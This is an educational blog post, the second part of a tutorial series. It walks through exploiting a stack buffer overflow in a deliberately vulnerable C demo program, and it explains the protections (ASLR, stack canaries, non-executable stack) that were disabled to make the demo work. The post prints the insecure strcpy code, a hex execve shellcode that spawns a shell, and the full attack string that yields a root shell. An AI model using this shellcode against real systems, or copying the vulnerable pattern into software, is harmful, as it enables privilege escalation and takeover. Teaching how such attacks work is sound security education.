Tallan Blog

Tallan’s Experts Share Their Knowledge on Technology, Trends and Solutions to Business Challenges

Exploring Buffer Overflows in C, Part Two: The Exploit

Welcome to part two of Exploring Buffer Overflows in C! If you have not taken the time to read the previous article I highly recommend doing so before going any further. In this post, I will be walking you through a simplified version of a buffer overflow exploit and will draw heavily on the vocabulary and theory discussed out in the last post. You can find Part One on Tallan’s Blog here. It also would be helpful to be familiar with hexadecimal numbers, which you can read about here. With that out of the way, let’s get to hacking.

Before We Begin

Before we can start we have to pick a target. Several methods exist to detect potential buffer overflows, ranging from manually reading the code to automated testing. Assuming you do have the source code of a program, searching for insecure functions in the C standard library is a basic, but excellent, starting point. Functions like strcat() and strcpy() do not check the length of the input strings relative to the size of the destination buffer – exactly the condition we are looking to exploit. Safe usage of these functions relies entirely upon the programmer’s implementation.

Acquiring the source code for multiple programs and combing through it for vulnerabilities can be tedious. For the sake of time, sanity, and copyright protection, we’ll be attacking a basic program made for this demo. Check out the source code for overflow.c below:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void vulnerableFunc(char* input) {
    char buffer[80];
    strcpy(buffer, input);
}

int main(int argc, char** argv) {
    if (argc != 2) {
        printf("Arguments: <buffer input>\n");
        exit(1);
    }

    vulnerableFunc(argv[1]);

    printf("Exiting...\n");
    exit(0);
}

The program takes one argument and passes it into vulnerableFunc() which creates a buffer and copies the argument into it. Then the program prints “Exiting…” and quits. It’s not an exciting (or useful) program but it sure is insecure! The call to strcpy() on line 7 is what we are going to be exploiting – notice how the developer didn’t check the length of what was being copied into buffer.
I mentioned earlier that this example is going to heavily simplified compared to a real-world example. Most operating systems and compilers have certain features enabled by default to prevent buffer overflows. Disabling security features on your regular computer is usually a Pretty Bad Idea, so I’ll be doing this demo in a Docker container running a 64 bit Ubuntu image. Towards the end of the post, I will go into more detail about the environment setup and some of the features designed to prevent these exploits.

What are we going to do tonight, Brain?

Before we start blindly throwing ourselves at the problem, let’s establish a game plan. If you remember from Part One: we want to fill the buffer with some malicious code, overflow past the end of the buffer, and overwrite the return address for the current function so it points back to the buffer (and therefore our code). We can break this down into a few steps:

  1. Find the size of the buffer
  2. Find the address of the buffer
  3. Find the return address
  4. Replace the return address with the buffer’s address
  5. Fill the buffer with malicious code
  6. Exploit!

The good news is we are already making progress – we know the size of the buffer by looking at the source code! buffer is defined as a char array of size 80. Step one was pretty easy, how hard can the rest be?

Poke it with a stick

We have to start somewhere. Let’s see what happens when you run the program normally. I’m going to use a sequence of A’s as our argument. At this point, the argument doesn’t really matter, but having a repeating character will be helpful. You’ll see why shortly. We’ll run the program twice, once with less than 80 A’s and another with more.

AAA Function

The first execution went as expected, we see “Exiting…” printed to the console. But the second execution crashed and printed “Segmentation fault”. Normally not a great sign when coding, but this is good news for us! A segmentation fault is an error thrown when a program tries to access restricted memory. The only thing that changed between the first and second call to overflow was our input – clearly something happened the second time around that caused our program to try and access off-limits memory. In order to figure out what is going on, we’re going to have to take a brief look at debugging C code with the GNU Debugger (GDB).

GNU territory

If you are unfamiliar with GDB the remainder of this article will probably seem pretty intimidating. I promise it’s not nearly as scary and alien as it seems – GDB is a debugger like any other. We will be setting breakpoints, viewing the contents of variables, and stepping through the code line by line like we are used to, only without a pretty user interface. Let’s start by displaying vulnerableFunc() and setting some breakpoints.

vulnerablefunc break points

We’re going to stop at line 7 and line 8, immediately before and immediately after we copy our input into the buffer. Let’s run our program in GDB with “AAAA” as our input. We’ll stop just before we copy anything into buffer so we can look at the contents.

AAAA Function Contents

Alright, let’s take this bit by bit. We ran our program in GDB with run AAAA which then hit our first breakpoint on line 7. The second command x /128bx buffer displays 128 bytes as hexadecimal characters, starting where buffer is stored in memory. The leftmost column displays the memory address where the first column is found. So in our example, buffer starts at memory address 0x7fffffffe600 and the first eight bytes are 0x00. Let’s see what happens after the call to strcpy(). The continue command will resume the program so we can get to the next breakpoint.

Next Break Point

We have data! The first four values of buffer are now 0x41. It might seem like nothing, but 0x41 is how the ASCII character A is represented as a hexadecimal value. Our buffer is starting to fill up. We know from looking at the source code that buffer is an array of 80 characters. Each character is a byte, so we should be able to fill up 80 bytes with no issues. Let’s run the program again, this time with 80 A’s, and see what our memory looks like after strcpy() returns.

strcpy return

Hopefully, it makes a little sense why the only input we are giving is a sequence of A’s. It makes it pretty obvious in memory! It looks like buffer starts at address 0x7fffffffe5c0 and ends at address 0x7fffffffe610, which is 80 bytes away. These addresses may change when we run the program, but that won’t be a problem. At the moment, we aren’t concerned with where certain values are stored, we want to know the distance between those values. No matter where our buffer is stored, it will always end 80 bytes later.

If everything above the purple line is our buffer, what is stored below the line? We know that we want to make our buffer overflow so we can overwrite the data there, but what is it exactly? This is where the concept of stack frames is important. If you remember from last time, the stack frame holds some data about where our function was called from, the arguments, and the return address. The goal is to overwrite the return address so we can control what the program does next. GDB makes this very easy with the info frame command. Let’s run the program again (using our 80 A’s) and see what information we can gather. The Docker container is running a 64 bit version of Ubuntu which stores the instruction pointer in a register called rip.

rip Value

Look at that! GDB not only tells us what the value of rip is (0x55555555472a) but it also tells us where it is stored in memory (0x7fffffffe618). But where is this relative to buffer?

Buffer and return address

We see buffer at address 0x7fffffffe5c0 and we see the return address at 0x7fffffffe618, just as GDB promised. Notice how the address in memory is reversed from how it is displayed by GDB. The computer I’m using uses little-endian byte order, which super simplified just means it stores data backwards. Don’t focus too much on what that really means, just remember that an address in memory will be reversed when it is used.

Looks like the address of buffer changed since the last time we ran the program! The good news is that the return address will always be the same distance from the end of the buffer. Doing some hexadecimal math:

0xe618 – 0xe5c0 = 0x58 -> 8810

Finding the difference between the addresses and converting it to decimal tells us that the return address is stored 88 bytes after the start of buffer. Since buffer has 80 bytes allocated for it, the leftover 8 bytes will overflow and end up right next to the return address. On 64 bit operating systems all memory addresses use 64 bits (8 bytes). If we provided 96 characters we would fill up the buffer, overflow so we are close to the return address, and then overwrite the entire return address. Let’s look at the buffer when we copy in 96 A’s.

96 As

info frame shows us that the return address is stored at 0x7fffffffe608, but look what’s in memory! We successfully overwrote the return address. When our function ends, the program will look to 0x7fffffffe608 to find which instruction to execute next. But instead of the original location, it will try and go to 0x4141414141414141. The odds of there being anything useful in that location are pretty small. We’ll change the return address to be equal to the address of the buffer so we can provide our own code to run.

Return to sender

We have our sequence of 96 A’s where the last 8 replace the return address stored on the stack. We need to change those 8 bytes to be the address of buffer. If the address of buffer is 0x7fffffffe5b0, we need to split that into individual bytes, reverse it (little-endian byte order!), and put it inside the argument. One tricky thing to note, GDB removes leading zeros for memory addresses. Our address is only twelve hexadecimal values, which is only six bytes. Since memory addresses on this computer are really 8 bytes long, we’ll add the missing zeroes to make sure our address works.

0x00007fffffffe5b0
0x00 0x00 0x7f 0xff 0xff 0xff 0xe5 0xb0
0xb0 0xe5 0xff 0xff 0xff 0x7f 0x00 0x00
\xb0\xe5\xff\xff\xff\x7f\x00\x00

The computer will interpret characters preceded by “\x” to be hexadecimal instead of regular ASCII characters. This is the difference between seeing “A” as a value in memory versus seeing “41”. Our input string now looks like this:

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xb0\xe5\xff\xff\xff\x7f\x00\x00

Let’s check if this successfully replaced the return address:

Replace Return Address

The memory address where the instruction pointer was stored now holds the reversed address of buffer, perfect! When our function finishes, the program will jump to our buffer to try and find the next instructions to execute, but “AAAAAAAA” is hardly a useful instruction. We’ll build our malicious code next.

Shellcode

The malicious code we are inserting into the buffer has one goal – to open a shell for us. Thus the creative name “shellcode” was born. The C standard library has several functions that can create new processes, but we’re going to focus on execve(). It takes three arguments: the path to a program, an array of arguments to pass to that program, and an array of environment settings. Using this information, it will replace the currently running process with whatever program you tell it to run. This means that everything after the call to execve() doesn’t happen! It is completely replaced in memory. Look at the example code below.

#include
#include
#include
main()
{
char* argv[] = {"/bin/sh", NULL};
char* env[] = {"FLAG=1", NULL};
execve(argv[0], argv, env);
printf("execve failed");
}

Now, let’s build this code and see what it does:

shellcode

Immediately after running the program an empty line with a “#” prompt appears. This is the new shell! It is no different from the shell we were just using to run our program. When we then exit this shell, we are put right back to where we were when we originally ran our shellcode. Notice how we don’t see “execve failed” printed to the console anywhere – that line was replaced with the successful call to execve(). This is the function we are going to use to hijack the vulnerable program.

Some assembly required

Unfortunately, it is not quite as simple as copying and pasting our code into the program’s input – we need to get the instructions that the processor can understand. When compiling code, there is an intermediate step between human readable text and an executable program where we can view the actual machine code.
There are two issues with this, however. The first: the steps to find these instructions is different for each compiler. This makes it difficult to write a good walkthrough! The second issue: our code is not optimized to take up as little space as possible. The instructions for the example shellcode took up a few hundred bytes of memory, way more than our buffer could hold. We’ll solve both of these problems as only programmers could – looking online! The website shell-storm is run by a security researcher who has compiled several versions of shellcodes that have been optimized for buffer overflows. I’ll be using the 27-byte version found here. The instructions, when converted into hexadecimal characters, looks like this:

\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05

Now we have to update our attack string so that the program can find our instructions when it tries to read our buffer! Our attack string currently looks like this:

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xb0\xe5\xff\xff\xff\x7f\x00\x00

We need to make sure the total size of our string remains the same so the return address is overwritten. If we’re going to prepend 27 bytes we need to remove 27 A’s. The final attack string looks like this:

\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xb0\xe5\xff\xff\xff\x7f\x00\x00
 

Running the program one more time:

Return points to buffer

We can see that the code was inserted right where buffer begins and our return address points to buffer. All that is left is to see if it works!

The same thing we do every night Pinky – try to take over the world!

Running the whoami command will print out your username. On this machine, the account being used is subtly named “hacker”. Let’s run the program one more time and see what happens.

success

I started off as “hacker”, ran the program, and now I have a shell open as the root user! It may not look like much, but it opens up many possibilities to the prepared hacker. None of the famous buffer overflow exploits mentioned in the last article were only buffer overflows – that was just the way in. From here we could install a keylogger, steal data on the server, or start sending out really annoying spam emails!

Pay no attention to that man behind the curtain.

Now if you’re sitting there thinking “wow you can teach someone to hack after one blog post, nothing is safe,” let me address some of your concerns and show you what I have been hiding behind the scenes. In short, this won’t work easily on a normal computer. There are a variety of security features I disabled when preparing this demo.

When I ran the Docker image, I needed to provide two flags: –privileged, to give the container full access to the host machine’s devices and memory, and –security-opt seccomp=undefined, to remove any security restrictions placed on the container. Once the container started, I had to disable an operating system feature named Address Space Layout Randomization, or ASLR. ASLR lets the operating system randomize where programs are loaded into memory. Remember how the address of buffer slightly changed at one point? That would have happened each time we ran the program, making it much more difficult to successfully change the return address.

I also had to provide options to the compiler to disable some features that it provides by default. The first was the flag –z execstack. This enables the program to run any instructions that are found on the stack. If we kept this enabled, our program would crash even if we used the correct attack string – it wouldn’t have been able to execute the shellcode. The other feature was disabled with –fno-stack-protector. This feature detects if there were any overflows on the stack by adding a hidden, randomized value in each stack frame and checking the value at the start and end of every function. If this value changes after a function begins, but before it returns, the program knows an overflow occurred and it is no longer safe to assume that the next instruction should be executed.

End of the line

We’ve gone from pure theory to a basic, working exploit in two blog posts. Buffer overflows may not be the most pressing security issue in 2019, but they do happen and they are not that difficult to exploit. Programmers have come up with solutions at the operating system and the compiler level, but the only surefire way to safeguard against buffer overflows (and most vulnerabilities) comes down to safe coding practices. A single if statement to make sure that the buffer is big enough would make this attack impossible.

The moral of the story? Never trust user input!


Click Here to learn more about Tallan or see us in person at one of many Events!

Share this post:

No comments

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

\\\